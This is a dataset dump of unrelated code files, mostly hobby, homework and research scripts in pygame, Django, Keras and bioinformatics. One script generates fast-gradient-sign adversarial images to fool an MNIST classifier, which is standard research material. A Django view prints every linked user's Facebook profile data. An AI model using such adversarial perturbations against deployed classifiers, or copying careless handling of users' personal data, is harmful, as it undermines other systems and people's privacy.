+{"seq_id":"134494759","text":"import pygame\r\nimport sys\r\nfrom pygame.locals import *\r\nfrom Vconstants import *\r\n\r\n\r\n\r\nsize = [SCREEN_WIDTH, SCREEN_HEIGHT]\r\nscreen = pygame.display.set_mode(size)\r\n\r\npygame.display.set_caption('WINNER!')\r\n\r\nclock = pygame.time.Clock()\r\n\r\nvbros = pygame.image.load('vbros.png')\r\ncap = pygame.image.load('capsunR2.png')\r\nframe_rate = 60\r\n\r\n\r\ndef winScreen():\r\n pygame.init()\r\n\r\n fontsize = 30\r\n font_change = 0\r\n\r\n titleFont = pygame.font.Font('freesansbold.ttf', 75)\r\n font_start = pygame.font.Font(None, fontsize)\r\n titleSurf = titleFont.render('!!WINNER!!', True, purple)\r\n # -- Attempt at growing text\r\n titleSurf2 = font_start.render('Success', True, blue)\r\n # - Hench 21 Image\r\n h21 = pygame.image.load('h21.png')\r\n h21 = pygame.transform.scale(h21, [95, 135])\r\n\r\n # -- Captain Sunshine\r\n cap_x = -230\r\n cap_y = 5\r\n\r\n capx_change = 6\r\n #capy_change =\r\n\r\n\r\n degrees1 = 0\r\n degrees2 = 0\r\n\r\n while True:\r\n\r\n cap_x += capx_change\r\n if cap_x > 1015:\r\n cap_x = -210\r\n\r\n\r\n screen.blit(pygame.transform.scale(vbros, (SCREEN_WIDTH, SCREEN_HEIGHT)), (0,0))\r\n screen.blit(cap, (cap_x, cap_y))\r\n # -- Adding Rotating Text\r\n rotatedSurf = pygame.transform.rotate(titleSurf, degrees1)\r\n rotatedRect = rotatedSurf.get_rect()\r\n rotatedRect.topleft = (200, SCREEN_HEIGHT / 2)\r\n screen.blit(rotatedSurf, rotatedRect)\r\n\r\n fontsize += font_change\r\n # - Other text\r\n #growSurf = pygame.transform.scale(titleSurf2, fontsize)\r\n growRect = titleSurf2.get_rect()\r\n growRect.topleft = (75, 200)\r\n #screen.blit(titleSurf2, growRect)\r\n\r\n #-- Add image\r\n rotate21 = pygame.transform.rotate(h21, degrees2)\r\n Rect21 = rotate21.get_rect()\r\n Rect21.topleft = (580, 390)\r\n screen.blit(rotate21, Rect21)\r\n\r\n #if checkForKeyPress():\r\n #pygame.event.get()\r\n #return\r\n pygame.display.update()\r\n clock.tick(frame_rate)\r\n degrees1 += 3\r\n degrees2 += 7\r\n font_change += 3\r\n\r\n if fontsize > 75:\r\n font_change -= 3\r\n if fontsize < 30:\r\n font_change += 3\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n","sub_path":"win_screen.py","file_name":"win_screen.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"345881436","text":"import os\n\nimport torch as T\nimport torchvision as tv\nfrom torch.autograd import Variable\n\nfrom mnist_cl import mnist_cl, criterion, test_iter, DEVICE\nfrom utils import get_cls_accuracy\n\nmodel = mnist_cl()\nmodel.load_state_dict(T.load('mnist_cl.pt'))\nmodel.train()\nmodel.to(DEVICE)\n\nsave_dir = './results/'\nos.makedirs(save_dir, exist_ok=True)\n\nfor i, (im, l) in enumerate(test_iter):\n x = Variable(T.cuda.FloatTensor(im.numpy()), requires_grad=True)\n\n l = l.to(DEVICE)\n x.grad = None\n logits = model(x)\n loss = criterion(logits, l)\n loss.backward()\n\n adv_noise = 0.2 * T.sign(x.grad.data)\n adv_x = T.clamp(x.data + adv_noise, 0, 1)\n\n tv.utils.save_image(x, save_dir + '%d.png' % i)\n tv.utils.save_image(adv_x, save_dir + '%d_adv.png' % i)\n\n with T.no_grad():\n pred2 = model(x)\n acc2 = get_cls_accuracy(pred2, l)\n pred1 = model(adv_x)\n acc1 = get_cls_accuracy(pred1, l)\n print('acc1: %.3f acc2: %.3f' % (acc1, acc2))\n","sub_path":"AdversarialSamples/mnist_fast_gradient.py","file_name":"mnist_fast_gradient.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"1642707","text":"import time\ndef inputTime():\n currentTime = time.strftime(\"%a %d %b %Y, %I:%M:%S, \",time.localtime())\n # Store current time in variable with format: \"Day Date, Time, \"\n return currentTime # return the variable\n\nwhile True: # while loop to continue indefinitely\n try: # try to open the file for reading\n outfile = open(\".\\hardlopers.txt\",\"r\")\n except IOError: # catch a possible error and create a file\n outfile = open(\".\\hardlopers.txt\",\"w\")\n outfile.close() # close file\n\n outfile = open(\".\\hardlopers.txt\",\"a\") # open file for appending\n naam = input(\"Geef de naam van de hardloper: \") # get input from the user\n outfile.write(inputTime() + naam + \"\\n\") # write the return value for inputTime, the name and an enter to the file\n outfile.close() # close file\n infile = open(\".\\hardlopers.txt\",\"r\") # open file for reading\n print(infile.read()) # print the entire file\n infile.close() # close file","sub_path":"Les5/prE5_4.py","file_name":"prE5_4.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"407474578","text":"import _pickle as pickle\nfrom collections import defaultdict\n\nclass Graph(object):\n 'Initialize Graph Object'\n\n def __init__(self):\n print(\"Initializing Graph Object\")\n\n try:\n pickle_file = open('imdb.pickle', 'rb')\n except IOError:\n print(\"Cannot find pickle file. Initializing new graph...\")\n self.is_pickled = False\n graph = defaultdict(set)\n else:\n print(\"Loading pickle file for scraper...\")\n self.is_pickled = True\n graph = pickle.load(pickle_file)\n pickle_file.close()\n \n self.graph = graph\n \n\n \n \n def addConnections(self, connections):\n\n if len(connections) == 0: return None\n\n for node1, node2 in connections:\n self.graph[node1].add(node2)\n \n\n def getNeighbors(self, node):\n if node == None or node == \"\": return None\n\n return self.graph[node]\n \n\n def findCommonNeighbors(self, nodes):\n\n if len(nodes) == 0: return None\n\n adj_sets = list()\n\n for node in nodes:\n adj_sets.append(self.getNeighbors(node))\n\n return list(set.intersection(*adj_sets))\n \n\n def saveGraph(self):\n\n #print(\"Serializing Search Graph with \" + str(len(self.graph.keys())) + \" keys\")\n with open('imdb.pickle', 'wb') as f:\n pickle.dump(self.graph, f)","sub_path":"IMBD/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"413834951","text":"from collections import deque\nfrom copy import deepcopy\n\n\nclass TNode(object):\n def __init__(self, data, left=None, right=None):\n self.left = left\n self.right = right\n self.data = data\n\n\ndef weave(l1, l2, prefix, results):\n if not (l1 and l2):\n p = deepcopy(prefix)\n p.extend(l1)\n p.extend(l2)\n results.append(p)\n return\n\n h1 = l1.popleft()\n prefix.append(h1)\n weave(l1, l2, prefix, results)\n prefix.pop()\n l1.appendleft(h1)\n\n h2 = l2.popleft()\n prefix.append(h2)\n weave(l1, l2, prefix, results)\n prefix.pop()\n l2.appendleft(h2)\n\n\ndef solve(bt):\n results = []\n if bt is None:\n results.append(deque())\n return results\n\n prefix = deque()\n prefix.append(bt.data)\n\n left = solve(bt.left)\n right = solve(bt.right)\n\n for l in left:\n for r in right:\n w = deque()\n weave(l, r, prefix, w)\n results.extend(w)\n\n return results\n\nif __name__ == '__main__':\n res = []\n bt = TNode(2)\n bt.left = TNode(1)\n bt.right = TNode(5)\n bt.right.right = TNode(7)\n bt.right.left = TNode(4)\n f = solve(bt)\n import ipdb; ipdb.set_trace()\n pass","sub_path":"cracking_the_coding_interview/q4.9.py","file_name":"q4.9.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"492500376","text":"import pprint\r\n\r\ndef makeGrid(width, height, default):\r\n grid = [default] * height\r\n for i in range(height):\r\n row = [default] * width\r\n grid[i] = row\r\n return grid\r\n\r\ndef gridWidth(grid):\r\n return len(grid[0])\r\n\r\ndef gridHeight(grid):\r\n return len(grid)\r\n\r\ndef makeLife(x, y, grid):\r\n grid[y][x] = 1\r\n\r\ndef kill(x, y, grid):\r\n grid[y][x] = 0\r\n\r\ndef cellValue(x, y, grid):\r\n return grid[y][x]\r\n\r\ndef isAlive(x, y, grid):\r\n return 1 == cellValue(x, y, grid)\r\n\r\ndef isDead(x, y, grid):\r\n return 0 == cellValue(x, y, grid)\r\n\r\ndef nextGen(grid):\r\n newGrid = makeGrid(gridWidth(grid), gridHeight(grid), 0)\r\n for y in range(gridHeight(grid)):\r\n for x in range(gridWidth(grid)):\r\n if updateCel(x, y, grid) == 'alive':\r\n makeLife(x, y, newGrid)\r\n else:\r\n kill(x, y, newGrid)\r\n return newGrid\r\n\r\ndef updateCel(x, y, grid):\r\n aliveNeighbors = 0\r\n gridw = gridWidth(grid)\r\n gridh = gridHeight(grid)\r\n def updateCount(xn, yn):\r\n nonlocal aliveNeighbors\r\n if not (xn < 0 or yn < 0 or xn >= gridh or yn >= gridh):\r\n if isAlive(xn, yn, grid):\r\n aliveNeighbors += 1\r\n def scanNeighbors():\r\n updateCount(x - 1, y - 1)\r\n updateCount(x, y - 1)\r\n updateCount(x + 1, y - 1)\r\n updateCount(x - 1, y)\r\n updateCount(x + 1, y)\r\n updateCount(x - 1, y + 1)\r\n updateCount(x, y + 1)\r\n updateCount(x + 1, y + 1)\r\n scanNeighbors()\r\n if isDead(x, y, grid):\r\n if aliveNeighbors == 3:\r\n return 'alive'\r\n else:\r\n if aliveNeighbors < 2 or aliveNeighbors > 3:\r\n return 'dead'\r\n else:\r\n return 'alive'\r\n\r\ndef printGame(grid):\r\n for row in grid:\r\n for el in row:\r\n if el == 0:\r\n print('.', end=' ')\r\n else:\r\n print('*', end=' ')\r\n print('')\r\n print('')\r\n\r\ndef showGenerations(grid, i):\r\n for gen in range(i):\r\n print('Generation ' + str(gen))\r\n grid = nextGen(grid)\r\n printGame(grid)\r\n print('')\r\n\r\ngrid = makeGrid(25, 25, 0)\r\n\r\ndef testShip(grid):\r\n makeLife(4, 2, grid)\r\n makeLife(4, 3, grid)\r\n makeLife(4, 4, grid)\r\n makeLife(3, 4, grid)\r\n makeLife(2, 3, grid)\r\n\r\ndef testLine(grid):\r\n makeLife(5, 5, grid)\r\n makeLife(5, 6, grid)\r\n makeLife(5, 7, grid)\r\n\r\ntestShip(grid)\r\nshowGenerations(grid, 3)\r\n\r\n","sub_path":"gameOfLife.py","file_name":"gameOfLife.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"225490541","text":"## A script to convert the shapit output into VCF format which can be parsed by to Rob's script (vcf2fasta.py) Whic hI've adapted into taking phased data\n\n\nimport argparse, sys\n\nparser = argparse.ArgumentParser(description=\"\"\"write a VCF-format file from the output of shapeit\"\"\")\nparser.add_argument('haps_file', help='the haplotype output (*.haps) of ShapeIt2 (assemble mode)')\nparser.add_argument('sample_file', help='the sample output (*.sample) of ShapeIt2 (assemble mode)')\nparser.add_argument('out_file', help='the name of the output file to write')\nargs = parser.parse_args()\n\nhaps = args.haps_file\nsamplefile = args.sample_file\noutput = args.out_file\n\nsamples = []\n\ny=0\nwith open(samplefile, 'rt') as s:\n\tfor i in s:\n\t\ty+=1\n\t\tif y <= 2:\n\t\t\tcontinue\n\t\tsamples.append(i.strip().split()[0])\n\ncounter=0\nwith open(haps, 'rt') as f_in, open(output, 'wt') as f_out:\n\n\tf_out.write('\\t'.join(['#CHROM', 'POS', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER', 'INFO', 'FORMAT'] + samples) + '\\n')\n\n\tfor i in f_in:\n\t\tcounter +=1\n\t\titems = i.strip(\"\\n\").split(\" \")\n\n\t\ttry:\n\t\t\tc = int(items[0])\n\t\t\tchrom = \"chr\" +str(c)\n\t\texcept ValueError:\n\t\t\tc = items[0]\n\t\t\tchrom = c\n\t\tpos = items[2]\n\t\tname = items[1]\n\t\tref= items[3]\n\t\talt =items[4]\n\t\thaplotypes = items[5:]\n\t\tgenotypes = [\"|\".join(haplotypes[i:i+2]) for i in range(0, len(haplotypes), 2)]\n\t\t## This little doozy, takes every phased haplotype and crams them back into genotypes that can then be used to generate FASTA sequences, which can then, in turn, be put into LDhelmet\n\t\t#print genotypes\n\t\toutline = [chrom,pos,name,ref, alt,\".\",\"PASS\",\".\", \"GT\"] + genotypes\n\t\tf_out.write(\"\\t\".join(outline)+\"\\n\")\n","sub_path":"shapeit_2_vcf.py","file_name":"shapeit_2_vcf.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"236186177","text":"'''Design python application which contains two threads named as thread1 and thread2.\r\nThread1 display 1 to 50 on screen and thread2 display 50 to 1 in reverse order on\r\nscreen. After execution of thread1 gets completed then schedule thread2.'''\r\n\r\nfrom threading import *\r\nfrom time import sleep\r\n\r\ndef ForwardOrder(num):\r\n print(\"Forward Order\")\r\n for i in range(1,num+1):\r\n print(i , end = \" \")\r\n \r\ndef ReverseOrder(num):\r\n print(\"Reverse Order\")\r\n for i in range(num,0,-1):\r\n print(i ,end = \" \")\r\n\r\ndef main():\r\n\r\n\r\n thread1 = Thread(target=ForwardOrder,args=[50],)\r\n thread2 = Thread(target=ReverseOrder, args=[50],)\r\n\r\n thread1.start()\r\n sleep(2)\r\n print()\r\n thread2.start()\r\n \r\n \r\n thread1.join()\r\n thread2.join()\r\n \r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"Assignment_8_Python/Assignment_8_5.py","file_name":"Assignment_8_5.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"91760059","text":"import matplotlib.pyplot as plt\nimport nibabel as nib\nimport scipy.ndimage as ndimage\nimport numpy as np\n\nbrain = nib.load(r'F:\\Hila\\Ax3D_Pack\\V6\\v7calibration\\TheBase4Ever\\YA_lab_Yaniv_002417_20210309_1521\\r20210309_152115T1wMPRAGERLs008a1001_brain.nii').get_fdata()\noverlay = nib.load(r'F:\\Hila\\Ax3D_Pack\\V6\\v7calibration\\TheBase4Ever\\YA_lab_Yaniv_002417_20210309_1521\\ADD_along_streamlines_WMmasked.nii').get_fdata()\ni=62 #or slice 62\n\nrot_brain = np.swapaxes(brain[i,:,:],1,0)\nrot_overlay = np.swapaxes(overlay[i,:,:],1,0)\nrot_brain = rot_brain[::-1,::-1]\nrot_overlay = rot_overlay[::-1,::-1]\n\nrot_overlay[rot_overlay<5] = np.nan\n\nrot_overlay[0:30,:] = np.nan\nrot_overlay[47:,:] = np.nan\nrot_overlay[:,82:] = np.nan\nrot_overlay[41:49,50:73] = np.nan\n\nfig, ax = plt.subplots()\n\nim1 = ax.imshow(rot_brain,cmap=plt.cm.get_cmap('gray'))\n\nim2 = ax.imshow(rot_overlay,cmap=plt.cm.get_cmap('hot').reversed(),vmin=6,vmax=12) #or 8 to 10\ncbar = ax.figure.colorbar(im2, ax=ax, ticks=[],shrink=0.7, aspect=15)\nplt.tight_layout()\nplt.axis('off')\nplt.show()","sub_path":"figure_creation_scripts/average_add_slice_vis.py","file_name":"average_add_slice_vis.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"35920668","text":"import requests\nfrom urllib.parse import quote_plus\n\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db.models import Q\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils import timezone\n\nfrom .forms import PostForm\nfrom .models import Post\n\ndef post_create(request):\n\tif not request.user.is_staff or not request.user.is_superuser:\n\t\traise Http404\n\t\t\n\tform = PostForm(request.POST or None, request.FILES or None)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.user = request.user\n\t\tinstance.save()\n\t\t# message success\n\t\tmessages.success(request, \"Successfully Created\")\n\t\treturn HttpResponseRedirect(instance.get_absolute_url())\n\tcontext = {\n\t\t\"form\": form,\n\t}\n\treturn render(request, \"posts/post_form.html\", context)\n\ndef post_detail(request, slug=None):\n\tinstance = get_object_or_404(Post, slug=slug)\n\tif instance.publish > timezone.now().date() or instance.draft:\n\t\tif not request.user.is_staff or not request.user.is_superuser:\n\t\t\traise Http404\n\tshare_string = quote_plus(instance.content)\n\tcontext = {\n\t\t\"title\": instance.title,\n\t\t\"instance\": instance,\n\t\t\"share_string\": share_string,\n\t}\n\treturn render(request, \"posts/post_detail.html\", context)\n\n\nfrom allauth.socialaccount.models import SocialAccount, SocialToken\ndef post_list(request):\n\tfball = SocialAccount.objects.filter(provider = 'facebook')\n\tfbid = SocialAccount.objects.filter(user=request.user, provider = 'facebook').first()\n\tsocial_token = SocialToken.objects.filter(\n\t\taccount__user = request.user, \n\t\taccount__provider = 'facebook').first()\n\tprint(fbid)\n\tuid = fbid.uid\n\ttoken = social_token.token\n\n\tbase_url = 'https://graph.facebook.com/v2.5/'\n\t# basic_info = \"{base_url}{fb_uid}?fields=id,name,picture,education,work&format=json\".format(\n\t# \tbase_url = base_url,\n\t# \tfb_uid = uid)\n\t# plus_token = \"{basic_info}&access_token={token}\".format(basic_info = basic_info, token=token)\n\t# r = requests.get(plus_token)\n\t# print(r.status_code)\n\t# print(r.json())\n\n\t### You can have this sort of function that runs every night, that updates information\n\tfor u in fball: \n\t\tbasic_info = \"{base_url}{fb_uid}?fields=id,name,picture,education,work&format=json\".format(\n\t\t\tbase_url = base_url,\n\t\t\tfb_uid = u.uid)\n\t\tplus_token = \"{basic_info}&access_token={token}\".format(basic_info = basic_info, token=token)\n\t\tr = requests.get(plus_token)\n\t\tprint(r.status_code)\n\t\tprint(r.json())\n\n\ttoday = timezone.now().date()\n\tqueryset_list = Post.objects.active() #.order_by(\"-timestamp\")\n\tif request.user.is_staff or request.user.is_superuser:\n\t\tqueryset_list = Post.objects.all()\n\t\n\tquery = request.GET.get(\"q\")\n\tif query:\n\t\tqueryset_list = queryset_list.filter(\n\t\t\t\tQ(title__icontains=query)|\n\t\t\t\tQ(content__icontains=query)|\n\t\t\t\tQ(user__first_name__icontains=query) |\n\t\t\t\tQ(user__last_name__icontains=query)\n\t\t\t\t).distinct()\n\tpaginator = Paginator(queryset_list, 8) # Show 25 contacts per page\n\tpage_request_var = \"page\"\n\tpage = request.GET.get(page_request_var)\n\ttry:\n\t\tqueryset = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\t# If page is not an integer, deliver first page.\n\t\tqueryset = paginator.page(1)\n\texcept EmptyPage:\n\t\t# If page is out of range (e.g. 9999), deliver last page of results.\n\t\tqueryset = paginator.page(paginator.num_pages)\n\n\n\tcontext = {\n\t\t\"object_list\": queryset, \n\t\t\"title\": \"List\",\n\t\t\"page_request_var\": page_request_var,\n\t\t\"today\": today,\n\t}\n\treturn render(request, \"posts/post_list.html\", context)\n\n\n\n\n\ndef post_update(request, slug=None):\n\tif not request.user.is_staff or not request.user.is_superuser:\n\t\traise Http404\n\tinstance = get_object_or_404(Post, slug=slug)\n\tform = PostForm(request.POST or None, request.FILES or None, instance=instance)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\tmessages.success(request, \"Item Saved\", extra_tags='html_safe')\n\t\treturn HttpResponseRedirect(instance.get_absolute_url())\n\n\tcontext = {\n\t\t\"title\": instance.title,\n\t\t\"instance\": instance,\n\t\t\"form\":form,\n\t}\n\treturn render(request, \"posts/post_form.html\", context)\n\n\n\ndef post_delete(request, slug=None):\n\tif not request.user.is_staff or not request.user.is_superuser:\n\t\traise Http404\n\tinstance = get_object_or_404(Post, slug=slug)\n\tinstance.delete()\n\tmessages.success(request, \"Successfully deleted\")\n\treturn redirect(\"posts:list\")\n","sub_path":"posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"283283454","text":"from collections import Counter\r\n\r\ndef solucao(entrada):\r\n entrada = ''.join(filter(str.isalpha, entrada))\r\n count = Counter(entrada.lower())\r\n keys = sorted(count)\r\n\r\n max_val = max(count.values())\r\n res = ''\r\n\r\n for i in keys:\r\n if count[i] == max_val:\r\n res += i\r\n\r\n print(res)\r\n return res\r\n\r\nn = int(input())\r\n\r\nfor i in range(n):\r\n entrada = input()\r\n solucao(entrada)","sub_path":"2021.2/linguagens_formais_e_automatos/listas/semana_6/frequencia_de_letras.py","file_name":"frequencia_de_letras.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"389600909","text":"import cv2\nimport matplotlib.pyplot as plt\nimport keras\nfrom keras.applications.resnet50 import ResNet50\nfrom keras.applications.resnet50 import preprocess_input, decode_predictions\nfrom keras.preprocessing import image\nfrom keras.models import Sequential\nfrom keras.utils import np_utils\nfrom sklearn.datasets import load_files\nfrom tqdm import tqdm\nimport numpy as np\nimport glob\nimport random\n\n# dog isolation and detection\n\nface_cascade = cv2.CascadeClassifier('haarcascades/haarcascade_frontalface_alt.xml')\n\ndef face_detector(img_path):\n img = cv2.imread(img_path)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray)\n return len(faces) > 0\n\nResNet50_model = ResNet50(weights = 'imagenet')\n\ndef path_to_tensor(img_path):\n img = image.load_img(img_path, target_size = (224, 224))\n x = image.img_to_array(img)\n \n return np.expand_dims(x, axis = 0)\n\ndef paths_to_tensor(img_paths):\n list_of_tensors = [path_to_tensor(img_path) for img_path in tqdm(img_paths)]\n\n return np.vstack(list_of_tensors)\n\ndef ResNet50_predict_labels(img_path):\n img = preprocess_input(path_to_tensor(img_path))\n\n return np.argmax(ResNet50_model.predict(img))\n\ndef dog_detector(img_path):\n prediction = ResNet50_predict_labels(img_path)\n\n return ((prediction <= 268) & (prediction >= 151))\n\n# breed prediction CNN\n\n# load datasets\ndef load_dataset(path):\n\tdata = load_files(path)\n\tdog_files = np.array(data['filenames'])\n\tdog_targets = np_utils.to_categorical(np.array(data['target']), 133)\n\n\treturn dog_files, dog_targets\n\ntrain_files, train_targets = load_dataset('dataset/dogImages/train')\nvalid_files, valid_targets = load_dataset('dataset/dogImages/valid')\ntest_files, test_targets = load_dataset('dataset/dogImages/test')\n\ndog_classes = [item[20:-1] for item in sorted(glob.glob('dataset/dogImages/train/*/'))]\n\n# human images\nhuman_files = np.array(glob.glob('dataset/humanImages/lfw/lfw/*/*'))\nrandom.seed(8675309)\nrandom.shuffle(human_files)\n\n# ResNet50 bottleneck features\nbottleneck_features = np.load('bottleneck_features/DogResnet50Data.npz')\ntrain_DogResnet50 = bottleneck_features['train']\nvalid_DogResnet50 = bottleneck_features['valid']\ntest_DogResnet50 = bottleneck_features['test']\n\n# define model, adding a few layers to ResNet\nResnet50_model = Sequential()\nResnet50_model.add(keras.layers.GlobalAveragePooling2D(input_shape = train_DogResnet50.shape[1:]))\nResnet50_model.add(keras.layers.Dense(133, activation = 'softmax'))\n\nResnet50_model.summary()\n\nResnet50_model.compile(optimizer = 'rmsprop', \n\t\t\t\t\t loss = 'categorical_crossentropy', \n\t\t\t\t\t metrics = ['accuracy'])\n\ncheckpoint = keras.callbacks.ModelCheckpoint(\n\t\t'saved_models/weights.best.ResNet50.hdf5', \n\t\tverbose = 1, \n\t\tsave_best_only = True\n)\n\nResnet50_model.fit(train_DogResnet50, train_targets, \n\tvalidation_data = (valid_DogResnet50, valid_targets), \n\tepochs = 20, batch_size = 20, callbacks = [checkpoint])\n\nResnet50_model.load_weights('saved_models/weights.best.ResNet50.hdf5')\nResnet50_predictions = [np.argmax(Resnet50_model.predict(np.expand_dims(feature, axis = 0))) for feature in test_DogResnet50]\n\n# \ntest_acc = np.sum(np.array(Resnet50_predictions) == np.argmax(test_targets, axis = 1)) / len(Resnet50_predictions) * 100\nprint('Test Accuracy: ' + str(test_acc))\n\n# predict dog breed with model\ndef dog_breed(img_path):\n\tbottleneck_features = ResNet50(weights = 'imagenet', \n\t\t\tinclude_top = False).predict(preprocess_input(path_to_tensor(img_path)))\n\n\tpredicted_vector = ResNet50_model.predict(bottleneck_features)\n\n\treturn dog_classes[np.argmax(predicted_vector)]\n\ndef dog_breed_predictor(img_path):\n\tbreed = dog_breed(img_path)\n\timg = cv2.imread(img_path)\n\tcv2rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\tplt.imshow(cv2rgb)\n\tplt.show()\n\n\tif dog_detector(img_path):\n\t\tprint('This is a dog and its breed is ' + str(breed))\n\telif face_detector(img_path):\n\t\tprint('This is a human but looks like a ' + str(breed))\n\telse:\n\t\tprint('Unsure of what this is.')\n\n# test predictor\ndog_breed_predictor('dataset/dogImages/test/001.Affenpinscher/Affenpinscher_00003.jpg')\ndog_breed_predictor('dataset/humanImages/lfw/lfw/Aaron_Eckhart/Aaron_Eckhart_0001.jpg')","sub_path":"dog-breed-id/breed-model.py","file_name":"breed-model.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"218177038","text":"'''\n5737. Find XOR Sum of All Pairs Bitwise AND\nAuthor: Ayushi Rawat\n\nThe XOR sum of a list is the bitwise XOR of all its elements. If the list only contains one element, then its XOR sum will be equal to this element.\n\nFor example, the XOR sum of [1,2,3,4] is equal to 1 XOR 2 XOR 3 XOR 4 = 4, and the XOR sum of [3] is equal to 3.\nYou are given two 0-indexed arrays arr1 and arr2 that consist only of non-negative integers.\n\nConsider the list containing the result of arr1[i] AND arr2[j] (bitwise AND) for every (i, j) pair where 0 <= i < arr1.length and 0 <= j < arr2.length.\n\nReturn the XOR sum of the aforementioned list.\n\nExample 1:\n\nInput: arr1 = [1,2,3], arr2 = [6,5]\nOutput: 0\nExplanation: The list = [1 AND 6, 1 AND 5, 2 AND 6, 2 AND 5, 3 AND 6, 3 AND 5] = [0,1,2,0,2,1].\nThe XOR sum = 0 XOR 1 XOR 2 XOR 0 XOR 2 XOR 1 = 0.\nExample 2:\n\nInput: arr1 = [12], arr2 = [4]\nOutput: 4\nExplanation: The list = [12 AND 4] = [4]. The XOR sum = 4.\n \n\nConstraints:\n\n1 <= arr1.length, arr2.length <= 105\n0 <= arr1[i], arr2[j] <= 109\n'''\n\nclass Solution:\n def getXORSum(self, arr1: List[int], arr2: List[int]) -> int:\n A1=[0]*32\n A2=[0]*32\n for a in arr1:\n for i in range(32):\n if a&(1<\" + str(curNode)\n curNode = curNode.next\n res += \")\"\n return res\n\n\ndef sizeByHeadNode( headNode ):\n if headNode == None:\n return 0\n\n curNode = headNode\n res = 0\n while curNode != None:\n res += 1\n curNode = curNode.next\n return res\n\n\ndef isAscendListByHeadNode( headNode ):\n\n curNode = headNode\n while curNode.next != None:\n if curNode.next.val < curNode.val:\n return False\n curNode = curNode.next\n return True\n\n \nclass Solution:\n # @param {ListNode[]} lists\n # @return {ListNode}\n def mergeKLists(self, lists):\n\n if len(lists) == 0:\n return None\n \n minheap = []\n for i in range(len(lists)):\n if lists[i] != None: \n minheap.append( (lists[i].val,i) )\n if len(minheap) == 0:\n return None\n \n heapq.heapify(minheap)\n #print(minheap)\n\n curNode = ListNode(None)\n headNode = curNode\n while len(minheap) > 0:\n curMinVal , listIndex = heapq.heappop(minheap)\n #print( \"lists = \" , lists )\n #print( \"curMinVal =\" , curMinVal )\n\n curNode.next = ListNode( curMinVal )\n curNode = curNode.next\n\n lists[listIndex] = lists[listIndex].next\n if lists[listIndex] != None:\n heapq.heappush( minheap , ( lists[listIndex].val , listIndex ) )\n \n return headNode.next\n\n\ndef bigTestMergeKLists():\n\n k = random.randint( 2 , 100 )\n lists = []\n elementsNum = 0\n for i in range( k ):\n n = random.randint( 10 , 1000 )\n arr = [random.randint(0,10**5)]\n for j in range(1,n):\n arr.append( arr[j-1] + random.randint(0,10**3) )\n elementsNum += len( arr )\n lists.append( createHeadListNodeByArray( arr ) )\n\n solver = Solution()\n resListNode = solver.mergeKLists( lists )\n if sizeByHeadNode( resListNode ) == elementsNum and isAscendListByHeadNode( resListNode ):\n print(\"ok\")\n else:\n print(\"ERROR\")\n\n\ndef smallTestMergeKLists():\n\n k = 3\n lists = []\n elementsNum = 0\n for i in range( k ):\n n = 5\n arr = [random.randint(0,100)]\n for j in range(1,n):\n arr.append( arr[j-1] + random.randint(0,10) )\n elementsNum += len( arr )\n lists.append( createHeadListNodeByArray( arr ) )\n\n solver = Solution()\n resListNode = solver.mergeKLists( lists )\n if sizeByHeadNode( resListNode ) == elementsNum and isAscendListByHeadNode( resListNode ):\n print(\"ok\")\n print( \"res =\" , listStringiByListNode( resListNode ) )\n else:\n print( \"len(res) =\" , sizeByHeadNode( resListNode ) )\n print( \"ERROR!!!\" , listStringiByListNode( resListNode ) )\n\n \nif __name__ == \"__main__\":\n\n bigTestMergeKLists()\n #smallTestMergeKLists()\n \n","sub_path":"023-Merge-K-Sorted-Lists[heapq]_20150623.py","file_name":"023-Merge-K-Sorted-Lists[heapq]_20150623.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"258060694","text":"##---------------------------------------------------------------------------\r\n##'History matching data assimilation technique using covariance localization with ESMDA for PUNQ Reservoir' ) \r\n##'Supervisor: Dr Rossmary Villegas'\r\n##'Co-supervisor: Dr Masoud Babei'\r\n##'Co-supervisor: Dr Oliver Dorn'\r\n##'PhD Student: Clement Etienam'\r\n##'MEng Student: Yap Shan 